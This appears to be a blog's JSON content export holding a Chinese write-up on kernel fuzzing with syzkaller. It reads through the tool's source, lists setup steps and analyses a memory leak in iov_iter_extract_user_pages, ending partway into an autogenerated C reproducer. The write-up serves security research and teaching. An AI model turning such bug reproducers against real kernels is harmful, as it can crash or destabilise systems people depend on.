content.json

{"meta":{"title":"V3rdant's Blog","subtitle":"","description":"","author":"V3rdant","url":"https://v3rdant.cn","root":"/"},"pages":[{"title":"About","date":"2024-01-26T14:29:02.754Z","updated":"2024-01-26T14:29:02.754Z","comments":false,"path":"about/index.html","permalink":"https://v3rdant.cn/about/index.html","excerpt":"","text":"Coder &amp; CTFer in WHU@noname team. I focus on the pwn and fuzz. As a pwner, now i more interest in kernel and broser. Communicate with me: wzhdxtx123@outlook.com"},{"title":"categories","date":"2019-05-03T04:03:35.000Z","updated":"2024-03-03T07:21:00.893Z","comments":true,"path":"categories/index.html","permalink":"https://v3rdant.cn/categories/index.html","excerpt":"","text":""},{"title":"Links","date":"2023-05-20T13:50:09.077Z","updated":"2023-05-20T13:50:09.077Z","comments":false,"path":"links/index.html","permalink":"https://v3rdant.cn/links/index.html","excerpt":"","text":""},{"title":"Repositories","date":"2023-04-25T07:27:03.633Z","updated":"2023-04-25T07:27:03.633Z","comments":false,"path":"repository/index.html","permalink":"https://v3rdant.cn/repository/index.html","excerpt":"","text":""},{"title":"tags","date":"2019-05-03T04:03:35.000Z","updated":"2024-03-03T07:19:29.005Z","comments":true,"path":"tags/index.html","permalink":"https://v3rdant.cn/tags/index.html","excerpt":"","text":""},{"title":"tags","date":"2024-03-03T07:18:57.000Z","updated":"2024-03-03T07:18:57.227Z","comments":true,"path":"tags/index-1.html","permalink":"https://v3rdant.cn/tags/index-1.html","excerpt":"","text":""}],"posts":[{"title":"Fuzz.Kernel-Fuzz-With-Syzkaller","slug":"Fuzz.Kernel-Fuzz-With-Syzkaller","date":"2024-03-01T07:39:31.000Z","updated":"2024-03-05T02:05:02.015Z","comments":true,"path":"Fuzz.Kernel-Fuzz-With-Syzkaller/","link":"","permalink":"https://v3rdant.cn/Fuzz.Kernel-Fuzz-With-Syzkaller/","excerpt":"为啥要做？做完后有何收获感想体会？","text":"overview 这一篇是笔者在上一门同linux有关的专选课程时的结课报告。 以笔者现在的眼光来看，这篇文章有相当的糊弄学的成分。笔者在阅读源代码的过程中，过多地关注了工程性的实现，而没有触及fuzz领域最核心的问题： syzkaller是如何抽象结构化的输入的 syzkaller的种子变异策略 这些部分笔者将在闲暇时间来补全，留在此处的，就暂且是一篇流水帐式的源代码阅读文章了 linux内核漏洞挖掘技术概要 当前，软件的自动化漏洞利用主要有以下三种技术： 符号执行、模糊测试（Fuzz）、污点分析。 其中，linux内核作为一个逻辑复杂的庞大项目，采用符号执行和污点分析的方法，在运行时间上开销过大，因此，目前广泛使用的方法是模糊测试（Fuzz）。 模糊测试指通过种子产生大量输入，然后根据运行信息对种子进行变异，引导产生新的输入语料，并运行测试的过程。 目前通行的内核测试框架是有Google 开源的syzkaller。 syzkaller仍然是基于覆盖率引导的fuzz框架，特别之处在于，由于内核给用户态的接口是一系列的系统调用，因此，syzkaller 将内核测试输入抽象化为一系列系统调用，采用syz-manager和syz-fuzzer的双端架构，实现了内核漏洞的快速挖掘 TODO [ ] 变异策略 [ ] 语料生成 [ ] syzlang书写 syzkaller 源代码分析 syzkaller 源代码如图，存在三个核心组件： syz-fuzzer syz-manager syz-executor syz-manager 进程启动、监视和重新启动多个 VM 实例，并在 VM 内启动 syz-fuzzer 进程。 syz-manager 负责长时间存储输入语料和崩溃报告。 一般在host机器上运行。 syz-fuzzer 进程运行在待测试VM中。 syz-fuzzer 指导模糊测试过程（输入生成、变异、最小化等），并通过 RPC 将触发新覆盖范围的输入发送回 syz-manager 进程。 它还负责启动 syz-executor 进程。 每个 syz-executor 进程执行一个输入（一系列系统调用）。 它接受从 syz-fuzzer 进程执行的程序并将结果发送回。 使用用 C++ 编写，编译为静态二进制文件并使用共享内存进行通信。 syz-fuzzer main fuzzer初始化 1234567891011121314debug.SetGCPercent(50)var ( flagName = flag.String(&quot;name&quot;, &quot;test&quot;, &quot;unique name for manager&quot;) flagOS = flag.String(&quot;os&quot;, runtime.GOOS, &quot;target OS&quot;) flagArch = flag.String(&quot;arch&quot;, runtime.GOARCH, &quot;target arch&quot;) flagManager = flag.String(&quot;manager&quot;, &quot;&quot;, &quot;manager rpc address&quot;) flagProcs = flag.Int(&quot;procs&quot;, 1, &quot;number of parallel test processes&quot;) flagOutput = flag.String(&quot;output&quot;, &quot;stdout&quot;, &quot;write programs to none/stdout/dmesg/file&quot;) flagTest = flag.Bool(&quot;test&quot;, false, &quot;enable image testing mode&quot;) // used by syz-ci flagRunTest = flag.Bool(&quot;runtest&quot;, false, &quot;enable program testing mode&quot;) // used by pkg/runtest flagRawCover = flag.Bool(&quot;raw_cover&quot;, false, &quot;fetch raw coverage&quot;))defer tool.Init()() 首先获取了相关参数。 12345678shutdown := make(chan struct&#123;&#125;)osutil.HandleInterrupts(shutdown)go func() &#123; // 应对GCE的抢占 &lt;-shutdown log.Logf(0, &quot;SYZ-FUZZER: PREEMPTED&quot;) os.Exit(1)&#125;() 然后启动了一个协程实现来检测shutdown信号，如果出现shutdown，需要停机并退出。 连接manager 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950log.Logf(1, &quot;connecting to manager...&quot;) a := &amp;rpctype.ConnectArgs&#123; Name: *flagName, MachineInfo: machineInfo, Modules: modules, &#125; r := &amp;rpctype.ConnectRes&#123;&#125; // 建立rpc链接 if err := manager.Call(&quot;Manager.Connect&quot;, a, r); err != nil &#123; log.SyzFatalf(&quot;failed to call Manager.Connect(): %v &quot;, err) &#125; featureFlags, err := csource.ParseFeaturesFlags(&quot;none&quot;, &quot;none&quot;, true) // 对于一些功能选项的处理 if err != nil &#123; log.SyzFatalf(&quot;%v&quot;, err) &#125; if r.CoverFilterBitmap != nil &#123; if err := osutil.WriteFile(&quot;syz-cover-bitmap&quot;, r.CoverFilterBitmap); err != nil &#123; log.SyzFatalf(&quot;failed to write syz-cover-bitmap: %v&quot;, err) &#125; &#125; if r.CheckResult == nil &#123; checkArgs.gitRevision = r.GitRevision checkArgs.targetRevision = r.TargetRevision checkArgs.enabledCalls = r.EnabledCalls checkArgs.allSandboxes = r.AllSandboxes checkArgs.featureFlags = featureFlags r.CheckResult, err = checkMachine(checkArgs) if err != nil &#123; if r.CheckResult == nil &#123; r.CheckResult = new(rpctype.CheckArgs) &#125; r.CheckResult.Error = err.Error() &#125; r.CheckResult.Name = *flagName if err := manager.Call(&quot;Manager.Check&quot;, r.CheckResult, nil); err != nil &#123; log.SyzFatalf(&quot;Manager.Check call failed: %v&quot;, err) &#125; if r.CheckResult.Error != &quot;&quot; &#123; log.SyzFatalf(&quot;%v&quot;, r.CheckResult.Error) &#125; &#125; else &#123; target.UpdateGlobs(r.CheckResult.GlobFiles) if err = host.Setup(target, r.CheckResult.Features, featureFlags, config.Executor); err != nil &#123; log.SyzFatalf(&quot;%v&quot;, err) &#125; &#125; log.Logf(0, &quot;syscalls: %v&quot;, len(r.CheckResult.EnabledCalls[sandbox])) for _, feat := range r.CheckResult.Features.Supported() &#123; log.Logf(0, &quot;%v: %v&quot;, feat.Name, feat.Reason) &#125; createIPCConfig(r.CheckResult.Features, config) 接下来启动进程连接syz-manager。manager 会检查本机环境并返回检查结果,然后根据检查结果设置一些执行选项,准备沙箱环境。 fuzzer process 123456789log.Logf(0, &quot;starting %v fuzzer processes&quot;, *flagProcs)for pid := 0; pid &lt; *flagProcs; pid++ &#123; proc, err := newProc(fuzzer, pid) if err != nil &#123; log.SyzFatalf(&quot;failed to create proc: %v&quot;, err) &#125; fuzzer.procs = append(fuzzer.procs, proc) go proc.loop()&#125; 接下来根据配置启动N个fuzz协程，每个协程对应一个VM实例。 1fuzzer.pollLoop() proc.loop proc.loop是进程运行的核心代码 12345678func (proc *Proc) loop() &#123; generatePeriod := 100 if proc.fuzzer.config.Flags&amp;ipc.FlagSignal == 0 &#123; // If we don&#x27;t have real coverage signal, generate programs more frequently // because fallback signal is weak. generatePeriod = 2 &#125; // 这部分代码在控制测试用例生成的频率。 判断配置是否没有启用真实的覆盖信号反馈(real coverage signal)。 如果没有启用真实覆盖信号,则将 generatePeriod 置为2,意味着每2个循环就随机生成一个新的测试用例。 之所以这么做是因为,如果没有真实的覆盖信号,只依赖fallback signal,那么信号会很弱。因此需要更频繁地生成新的测试用例来弥补。 123456789101112131415for i := 0; ; i++ &#123; item := proc.fuzzer.workQueue.dequeue() if item != nil &#123; switch item := item.(type) &#123; case *WorkTriage: proc.triageInput(item) case *WorkCandidate: proc.execute(proc.execOpts, item.p, item.flags, StatCandidate) case *WorkSmash: proc.smashInput(item) default: log.SyzFatalf(&quot;unknown work type: %#v&quot;, item) &#125; continue &#125; 每次从 workQueue 中取出一个测试用例，并根据测试用例的不同类型来解析 123456789101112131415161718 ct := proc.fuzzer.choiceTable fuzzerSnapshot := proc.fuzzer.snapshot() if len(fuzzerSnapshot.corpus) == 0 || i%generatePeriod == 0 &#123; // 产生新进程 p := proc.fuzzer.target.Generate(proc.rnd, prog.RecommendedCalls, ct) log.Logf(1, &quot;#%v: generated&quot;, proc.pid) proc.executeAndCollide(proc.execOpts, p, ProgNormal, StatGenerate) &#125; else &#123; // 变异已经存在的进程 p := fuzzerSnapshot.chooseProgram(proc.rnd).Clone() p.Mutate(proc.rnd, prog.RecommendedCalls, ct, proc.fuzzer.noMutate, fuzzerSnapshot.corpus) log.Logf(1, &quot;#%v: mutated&quot;, proc.pid) proc.executeAndCollide(proc.execOpts, p, ProgNormal, StatFuzz) &#125; &#125;&#125; 获取choice table和corpus的快照copy。 根据条件选择逻辑: 如果corpus为空或每100次循环执行一次,则通过Generate完全随机生成一个新的测试用例prog; 否则,从corpus中随机选择一个case作为基础,通过Mutate进行变异生成新的prog。 生成的prog通过executeAndCollide执行和碰撞检测。 fuzzer.pollLoop 主线程在启动这些协程之后所需要做的工作其实就是响应这些协程的请求，并负责与 syz-manager 间进行 RPC 通信，通过一个不会返回的 pollLoop() 函数完成，该函数核心其实就是一个无限循环： 循环等待 ticker （每 3s 响应一次的计时器）或 fuzzer.needPoll 这两个 channel 之一有数据传来 如果是 fuzzer.needPoll1 传来请求或是距离上次 poll 的时间大于 10s： 检查 workQueue 是否需要新的 candidate（candidate 数量少于 executor 数量），若不是且本次请求处理为 fuzzer.needPoll 传来请求，则等到到距离上次 poll 的时间大于 10s。 收集 executor 数据，调用 poll() 通过 RPC 向 syz-manager 获取新的 candidate 1234567891011121314151617181920212223242526272829303132333435363738394041424344func (fuzzer *Fuzzer) pollLoop() &#123; var execTotal uint64 var lastPoll time.Time var lastPrint time.Time ticker := time.NewTicker(3 * time.Second * fuzzer.timeouts.Scale).C for &#123; poll := false select &#123; case &lt;-ticker: case &lt;-fuzzer.needPoll: poll = true &#125; // 循环等待 `ticker` （每 3s 响应一次的计时器）或 `fuzzer.needPoll` // 这两个 channel 之一有数据传来 if fuzzer.outputType != OutputStdout &amp;&amp; time.Since(lastPrint) &gt; 10*time.Second*fuzzer.timeouts.Scale &#123; // 如果是 `fuzzer.needPoll1` 传来请求或是距离上次 poll 的时间大于 10s： log.Logf(0, &quot;alive, executed %v&quot;, execTotal) lastPrint = time.Now() &#125; if poll || time.Since(lastPoll) &gt; 10*time.Second*fuzzer.timeouts.Scale &#123; needCandidates := fuzzer.workQueue.wantCandidates() if poll &amp;&amp; !needCandidates &#123; continue &#125; // 检查 workQueue 是否需要新的 candidate（candidate 数量少于 executor 数量） // 若不是且本次请求处理为 `fuzzer.needPoll` 传来请求 // 则等到到距离上次 poll 的时间大于 10s stats := make(map[string]uint64) for _, proc := range fuzzer.procs &#123; stats[&quot;exec total&quot;] += atomic.SwapUint64(&amp;proc.env.StatExecs, 0) stats[&quot;executor restarts&quot;] += atomic.SwapUint64(&amp;proc.env.StatRestarts, 0) &#125; // 收集 executor 数据，调用 poll() 通过 RPC 向 syz-manager 获取新的 candidate for stat := Stat(0); stat &lt; StatCount; stat++ &#123; v := atomic.SwapUint64(&amp;fuzzer.stats[stat], 0) stats[statNames[stat]] = v execTotal += v &#125; if !fuzzer.poll(needCandidates, stats) &#123; lastPoll = time.Now() &#125; &#125; &#125;&#125; syz-manager main 12345678910111213141516func main() &#123; if prog.GitRevision == &quot;&quot; &#123; log.Fatalf(&quot;bad syz-manager build: build with make, run bin/syz-manager&quot;) &#125; flag.Parse() // 解析参数 log.EnableLogCaching(1000, 1&lt;&lt;20) cfg, err := mgrconfig.LoadFile(*flagConfig) if err != nil &#123; log.Fatalf(&quot;%v&quot;, err) &#125; if cfg.DashboardAddr != &quot;&quot; &#123; // This lets better distinguish logs of individual syz-manager instances. log.SetName(cfg.Name) &#125; RunManager(cfg) // 真正的启动函数&#125; 主要是解析参数和配置文件，然后调用RunManager RunManager 123456789101112var vmPool *vm.Pool // Type &quot;none&quot; is a special case for debugging/development when manager // does not start any VMs, but instead you start them manually // and start syz-fuzzer there. if cfg.Type != &quot;none&quot; &#123; var err error vmPool, err = vm.Create(cfg, *flagDebug) if err != nil &#123; log.Fatalf(&quot;%v&quot;, err) &#125; &#125; 首先创建了vmPool ， 用来管理VM资源 1234567crashdir := filepath.Join(cfg.Workdir, &quot;crashes&quot;)osutil.MkdirAll(crashdir)reporter, err := report.NewReporter(cfg)if err != nil &#123; log.Fatalf(&quot;%v&quot;, err)&#125; 然后初始化了测试语料库并创建了crash的记录文件， 接着初始化了一个HTTP服务器，用来在本地端口以Web页面的形式呈现测试结果 1234mgr.preloadCorpus() // 准备输入语料mgr.initStats() // 初始化一状态变量mgr.initHTTP() // 初始化了一个HTTP服务器mgr.collectUsedFiles() // 收集使用过的文件 1234567891011121314151617181920212223242526go func() &#123; for lastTime := time.Now(); ; &#123; time.Sleep(10 * time.Second) now := time.Now() diff := now.Sub(lastTime) lastTime = now mgr.mu.Lock() if mgr.firstConnect.IsZero() &#123; mgr.mu.Unlock() continue &#125; mgr.fuzzingTime += diff * time.Duration(atomic.LoadUint32(&amp;mgr.numFuzzing)) executed := mgr.stats.execTotal.get() crashes := mgr.stats.crashes.get() corpusCover := mgr.stats.corpusCover.get() corpusSignal := mgr.stats.corpusSignal.get() maxSignal := mgr.stats.maxSignal.get() triageQLen := len(mgr.candidates) mgr.mu.Unlock() numReproducing := atomic.LoadUint32(&amp;mgr.numReproducing) numFuzzing := atomic.LoadUint32(&amp;mgr.numFuzzing) log.Logf(0, &quot;VMs %v, executed %v, cover %v, signal %v/%v, crashes %v, repro %v, triageQLen %v&quot;, numFuzzing, executed, corpusCover, corpusSignal, maxSignal, crashes, numReproducing, triageQLen) &#125;&#125;() 这部分代码定义了一个匿名goroutine函数,主要完成了以下工作: 定义一个循环,按照10秒的间隔周期性执行 计算从上次统计到当前时间段的执行时间差值diff 获取mgr对象的各种统计指标: execTotal: 执行的测试用例总数 crashes: 崩溃的测试用例数 corpusCover: 测试用例覆盖的代码行数 corpusSignal/maxSignal: 获取的代码覆盖信号总值和最大信号值 triageQLen: 等待处理的候选测试用例数 加载处理测试用例的虚拟机数量,复现测试的用例数等指标 将上述统计指标打印输出一次日志 12345678osutil.HandleInterrupts(vm.Shutdown) if mgr.vmPool == nil &#123; log.Logf(0, &quot;no VMs started (type=none)&quot;) log.Logf(0, &quot;you are supposed to start syz-fuzzer manually as:&quot;) log.Logf(0, &quot;syz-fuzzer -manager=manager.ip:%v [other flags as necessary]&quot;, mgr.serv.port) &lt;-vm.Shutdown return &#125; 实现了针对VM corruption的处理 1mgr.vmLoop() 最后是一个主循环，用来做任务处理 manager.vmLoop 123456789101112131415log.Logf(0, &quot;booting test machines...&quot;)log.Logf(0, &quot;wait for the connection from test machine...&quot;)instancesPerRepro := 3vmCount := mgr.vmPool.Count()maxReproVMs := vmCount - mgr.cfg.FuzzingVMsif instancesPerRepro &gt; maxReproVMs &amp;&amp; maxReproVMs &gt; 0 &#123; instancesPerRepro = maxReproVMs&#125;instances := SequentialResourcePool(vmCount, 10*time.Second*mgr.cfg.Timeouts.Scale)runDone := make(chan *RunResult, 1)pendingRepro := make(map[*Crash]bool)reproducing := make(map[string]bool)var reproQueue []*CrashreproDone := make(chan *ReproResult, 1)stopPending := false 首先初始化了一些变量，用来通信和复现 123mgr.mu.Lock()phase := mgr.phasemgr.mu.Unlock() 加锁访问 mgr 的相关变量 123456789101112131415for crash := range pendingRepro &#123; if reproducing[crash.Title] &#123; continue &#125; delete(pendingRepro, crash) if !mgr.needRepro(crash) &#123; continue &#125; log.Logf(1, &quot;loop: add to repro queue &#x27;%v&#x27;&quot;, crash.Title) reproducing[crash.Title] = true reproQueue = append(reproQueue, crash)&#125;log.Logf(1, &quot;loop: phase=%v shutdown=%v instances=%v/%v %+v repro: pending=%v reproducing=%v queued=%v&quot;, phase, shutdown == nil, instances.Len(), vmCount, instances.Snapshot(), len(pendingRepro), len(reproducing), len(reproQueue)) 对于没有尝试过复现的crash，加入复现队列 123456789101112131415161718192021222324252627282930313233343536canRepro := func() bool &#123; return phase &gt;= phaseTriagedHub &amp;&amp; len(reproQueue) != 0 &amp;&amp; (int(atomic.LoadUint32(&amp;mgr.numReproducing))+1)*instancesPerRepro &lt;= maxReproVMs&#125; // 设置了一个闭包判断当前能否启动复现任务if shutdown != nil &#123; // 如果当前可以启动复现任务 for canRepro() &#123; vmIndexes := instances.Take(instancesPerRepro) // 找到一个可用的VM if vmIndexes == nil &#123; break &#125; last := len(reproQueue) - 1 crash := reproQueue[last] reproQueue[last] = nil reproQueue = reproQueue[:last] atomic.AddUint32(&amp;mgr.numReproducing, 1) log.Logf(0, &quot;loop: starting repro of &#x27;%v&#x27; on instances %+v&quot;, crash.Title, vmIndexes) go func() &#123; reproDone &lt;- mgr.runRepro(crash, vmIndexes, instances.Put) &#125;() // 启动一个协程，在可用VM上开始复现crash &#125; for !canRepro() &#123; idx := instances.TakeOne() if idx == nil &#123; break &#125; log.Logf(1, &quot;loop: starting instance %v&quot;, *idx) go func() &#123; crash, err := mgr.runInstance(*idx) runDone &lt;- &amp;RunResult&#123;*idx, crash, err&#125; &#125;() // 直接重启VM &#125;&#125; 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263wait: select &#123; case &lt;-instances.Freed: // 一个实例被释放 case stopRequest &lt;- true: log.Logf(1, &quot;loop: issued stop request&quot;) stopPending = true case res := &lt;-runDone: log.Logf(1, &quot;loop: instance %v finished, crash=%v&quot;, res.idx, res.crash != nil) if res.err != nil &amp;&amp; shutdown != nil &#123; log.Logf(0, &quot;%v&quot;, res.err) &#125; stopPending = false instances.Put(res.idx) // 如果qemu的shutdown信号为singnal 2 // 将其设定为失去连接而不是crash if shutdown != nil &amp;&amp; res.crash != nil &#123; needRepro := mgr.saveCrash(res.crash) if needRepro &#123; log.Logf(1, &quot;loop: add pending repro for &#x27;%v&#x27;&quot;, res.crash.Title) pendingRepro[res.crash] = true &#125; &#125; case res := &lt;-reproDone: atomic.AddUint32(&amp;mgr.numReproducing, ^uint32(0)) crepro := false title := &quot;&quot; if res.repro != nil &#123; crepro = res.repro.CRepro title = res.repro.Report.Title &#125; log.Logf(0, &quot;loop: repro on %+v finished &#x27;%v&#x27;, repro=%v crepro=%v desc=&#x27;%v&#x27;&quot;, res.instances, res.report0.Title, res.repro != nil, crepro, title) if res.err != nil &#123; reportReproError(res.err) &#125; delete(reproducing, res.report0.Title) if res.repro == nil &#123; if !res.hub &#123; mgr.saveFailedRepro(res.report0, res.stats) &#125; &#125; else &#123; mgr.saveRepro(res) &#125; case &lt;-shutdown: log.Logf(1, &quot;loop: shutting down...&quot;) shutdown = nil case crash := &lt;-mgr.hubReproQueue: log.Logf(1, &quot;loop: get repro from hub&quot;) pendingRepro[crash] = true case reply := &lt;-mgr.needMoreRepros: reply &lt;- phase &gt;= phaseTriagedHub &amp;&amp; len(reproQueue)+len(pendingRepro)+len(reproducing) == 0 goto wait case reply := &lt;-mgr.reproRequest: repros := make(map[string]bool) for title := range reproducing &#123; repros[title] = true &#125; reply &lt;- repros goto wait &#125;&#125; 这部分代码是用来实现虚拟机管理的核心代码： instances.Freed: 处理空闲的虚拟机实例 stopRequest:发出停止虚拟机的请求 runDone: 处理虚拟机运行结束的结果 如果运行失败,打印错误 释放实例,增加到空闲池 如果本次运行触发了crash,保存crash并添加到待repro队列 reproDone: 处理repro结束的结果 更新repro任务计数 打印repro的结果 如果repro失败,记录信息 从正在repro列表删除 根据repro的结果保存信息 shutdown: 检测到关闭信号,开始关闭 hubReproQueue: 从主机获取的待repro crash needMoreRepros: 返回还有待repro的crash状态 reproRequest: 返回当前正在repro的crash列表 sys-executor sys-executor 是一个使用C++写的执行器，用来真正执行 测试语料 12345678910111213141516171819202122232425262728293031 if (argc == 2 &amp;&amp; strcmp(argv[1], &quot;version&quot;) == 0) &#123; puts(GOOS &quot; &quot; GOARCH &quot; &quot; SYZ_REVISION &quot; &quot; GIT_REVISION); return 0; &#125; if (argc &gt;= 2 &amp;&amp; strcmp(argv[1], &quot;setup&quot;) == 0) &#123; setup_features(argv + 2, argc - 2); return 0; &#125; if (argc &gt;= 2 &amp;&amp; strcmp(argv[1], &quot;leak&quot;) == 0) &#123;#if SYZ_HAVE_LEAK_CHECK check_leaks(argv + 2, argc - 2);#else fail(&quot;leak checking is not implemented&quot;);#endif return 0; &#125; if (argc &gt;= 2 &amp;&amp; strcmp(argv[1], &quot;setup_kcsan_filterlist&quot;) == 0) &#123;#if SYZ_HAVE_KCSAN setup_kcsan_filterlist(argv + 2, argc - 2, true);#else fail(&quot;KCSAN is not implemented&quot;);#endif return 0; &#125; if (argc == 2 &amp;&amp; strcmp(argv[1], &quot;test&quot;) == 0) return run_tests(); if (argc &lt; 2 || strcmp(argv[1], &quot;exec&quot;) != 0) &#123; fprintf(stderr, &quot;unknown command&quot;); return 1; &#125; 程序首先解析了一系列参数 1234567891011121314 start_time_ms = current_time_ms(); // 设置fuzz启动时间 os_init(argc, argv, (char*)SYZ_DATA_OFFSET, SYZ_NUM_PAGES * SYZ_PAGE_SIZE); // 初始化系统调用 current_thread = &amp;threads[0];#if SYZ_EXECUTOR_USES_SHMEM void* mmap_out = mmap(NULL, kMaxInput, PROT_READ, MAP_PRIVATE, kInFd, 0);#else void* mmap_out = mmap(NULL, kMaxInput, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0); // 设置输出共享内存#endif if (mmap_out == MAP_FAILED) fail(&quot;mmap of input file failed&quot;); input_data = static_cast&lt;char*&gt;(mmap_out); 123456789#if SYZ_EXECUTOR_USES_SHMEM mmap_output(kInitialOutput); // Prevent test programs to mess with these fds. // Due to races in collider mode, a program can e.g. ftruncate one of these fds, // which will cause fuzzer to crash. close(kInFd);#if !SYZ_EXECUTOR_USES_FORK_SERVER close(kOutFd);#endif 接下来是一些准备工作 12345678 use_temporary_dir(); // 创建临时目录 install_segv_handler(); // 设置了段错误信号(SIGSEGV、SIGBUS)的处理函数为segv_handler setup_control_pipes(); // 重定位标准输入和输出到pipe，便于错误#if SYZ_EXECUTOR_USES_FORK_SERVER receive_handshake(); // 确定连接状态#else receive_execute(); // 从管道读取执行请求execute_req#endif 然后是关于测试覆盖率的计算： 1234567891011121314151617181920212223242526272829303132333435 if (flag_coverage) &#123; int create_count = kCoverDefaultCount, mmap_count = create_count; if (flag_delay_kcov_mmap) &#123; create_count = kCoverOptimizedCount; mmap_count = kCoverOptimizedPreMmap; &#125; if (create_count &gt; kMaxThreads) create_count = kMaxThreads; // 计算需要传见的文件数量 for (int i = 0; i &lt; create_count; i++) &#123; threads[i].cov.fd = kCoverFd + i; // 创建覆盖率文件描述符 cover_open(&amp;threads[i].cov, false); if (i &lt; mmap_count) &#123; // Pre-mmap coverage collection for some threads. This should be enough for almost // all programs, for the remaning few ones coverage will be set up when it&#x27;s needed. thread_mmap_cover(&amp;threads[i]); // 对部分线程提前进行覆盖率mmap,这对大多数程序已经足够 //Remaining的线程会在需要时再设置 &#125; &#125; char sep = &#x27;/&#x27;;#if GOOS_windows sep = &#x27;\\\\&#x27;;#endif char filename[1024] = &#123;0&#125;; char* end = strrchr(argv[0], sep); size_t len = end - argv[0]; strncpy(filename, argv[0], len + 1); strncat(filename, &quot;syz-cover-bitmap&quot;, 17); filename[sizeof(filename) - 1] = &#x27;\\0&#x27;; init_coverage_filter(filename); // 创建覆盖率的bitmap文件 &#125; 然后开始创建执行sandbox: 123456789101112131415161718192021 int status = 0; if (flag_sandbox_none) status = do_sandbox_none(); #if SYZ_HAVE_SANDBOX_SETUID else if (flag_sandbox_setuid) status = do_sandbox_setuid(); // 设置setuid沙箱#endif #if SYZ_HAVE_SANDBOX_NAMESPACE else if (flag_sandbox_namespace) status = do_sandbox_namespace(); // 设置namespace沙箱#endif #if SYZ_HAVE_SANDBOX_ANDROID else if (flag_sandbox_android) status = do_sandbox_android(sandbox) // 设置 android沙箱#endif else fail(&quot;unknown sandbox type&quot;); 最后执行错误处理 12345678910111213141516171819#if SYZ_EXECUTOR_USES_FORK_SERVER fprintf(stderr, &quot;loop exited with status %d\\n&quot;, status); // Other statuses happen when fuzzer processes manages to kill loop, e.g. with: // ptrace(PTRACE_SEIZE, 1, 0, 0x100040) if (status != kFailStatus) status = 0; // If an external sandbox process wraps executor, the out pipe will be closed // before the sandbox process exits this will make ipc package kill the sandbox. // As the result sandbox process will exit with exit status 9 instead of the executor // exit status (notably kFailStatus). So we duplicate the exit status on the pipe. reply_execute(status); doexit(status); // Unreachable. return 1; #else reply_execute(status); return status; #endif &#125; 使用syzkaller进行漏洞挖掘 环境配置 编译syzkaller: 123$ go get -u -d github.com/google/syzkaller/prog$ cd gopath/src/github.com/google/syzkaller/$ make 编译目标内核的内核版本是linux-6.5.4 开启相关debug选项： 123456CONFIG_KCOV=yCONFIG_DEBUG_INFO=yCONFIG_KASAN=yCONFIG_KASAN_INLINE=yCONFIG_CONFIGFS_FS=yCONFIG_SECURITYFS=y 创建镜像： 123456$ sudo apt-get install debootstrap$ mkdir image$ cd image$ wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh$ chmod +x create-image.sh$ ./create-image.sh qemu启动脚本和qemu.cfg如下： 运行syzkaller 在经过3、4天的运行后，结果如下： 漏洞分析 这里选择 memory leak in iov_iter_extract_pages 来进行分析。 首先查看crash时的函数调用栈： 定位 iov_iter_exxtract_pages 函数， 这个函数从基于用户空间内存的迭代器中提取出一组连续的页面,并对这些页面加锁pin。 12345678910111213141516171819202122232425262728293031323334353637// lib/iov_iter.cstatic ssize_t iov_iter_extract_user_pages(struct iov_iter *i, struct page ***pages, size_t maxsize, unsigned int maxpages, iov_iter_extraction_t extraction_flags, size_t *offset0)&#123; unsigned long addr; unsigned int gup_flags = 0; size_t offset; int res; if (i-&gt;data_source == ITER_DEST) gup_flags |= FOLL_WRITE; if (extraction_flags &amp; ITER_ALLOW_P2PDMA) gup_flags |= FOLL_PCI_P2PDMA; if (i-&gt;nofault) gup_flags |= FOLL_NOFAULT; addr = first_iovec_segment(i, &amp;maxsize); *offset0 = offset = addr % PAGE_SIZE; addr &amp;= PAGE_MASK; maxpages = want_pages_array(pages, maxsize, offset, maxpages); if (!maxpages) return -ENOMEM; // 根据迭代器的信息,计算出需要提取的用户空间地址范围。 res = pin_user_pages_fast(addr, maxpages, gup_flags, *pages); // 调用pin_user_pages_fast()对该地址范围内的页面加锁 if (unlikely(res &lt;= 0)) return res; maxsize = min_t(size_t, maxsize, res * PAGE_SIZE - offset); // 根据实际加锁的页面数量,计算迭代器可以前进的最大长度。 iov_iter_advance(i, maxsize); // 调用iov_iter_advance()移动迭代器。 return maxsize;&#125; 而syzkaller给出的漏洞是memory leak，即存在分配未释放的内存。 在wamt_pages_array 三个函数中筛选 123456789101112131415static int want_pages_array(struct page ***res, size_t size, size_t start, unsigned int maxpages)&#123; unsigned int count = DIV_ROUND_UP(size + start, PAGE_SIZE); if (count &gt; maxpages) count = maxpages; WARN_ON(!count); // caller should&#x27;ve prevented that if (!*res) &#123; *res = kvmalloc_array(count, sizeof(struct page *), GFP_KERNEL); if (!*res) return 0; &#125; return count;&#125; 发现只有 want_pages_array 中存在堆内存分配。 如果: 12if (unlikely(res &lt;= 0)) return res; 此时，程序错误返回，前面分配的pages空间却并没有被释放，因此，会引发内存泄漏。 复现的C代码如下： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234// autogenerated by syzkaller (https://github.com/google/syzkaller)#define _GNU_SOURCE #include &lt;dirent.h&gt;#include &lt;endian.h&gt;#include &lt;errno.h&gt;#include &lt;fcntl.h&gt;#include &lt;signal.h&gt;#include &lt;stdarg.h&gt;#include &lt;stdbool.h&gt;#include &lt;stdint.h&gt;#include &lt;stdio.h&gt;#include &lt;stdlib.h&gt;#include &lt;string.h&gt;#include &lt;sys/prctl.h&gt;#include &lt;sys/stat.h&gt;#include &lt;sys/syscall.h&gt;#include &lt;sys/types.h&gt;#include &lt;sys/wait.h&gt;#include &lt;time.h&gt;#include &lt;unistd.h&gt;static void sleep_ms(uint64_t ms)&#123; usleep(ms * 1000);&#125;static uint64_t current_time_ms(void)&#123; struct timespec ts; if (clock_gettime(CLOCK_MONOTONIC, &amp;ts)) exit(1); return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;&#125;static bool write_file(const char* file, const char* what, ...)&#123; char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd 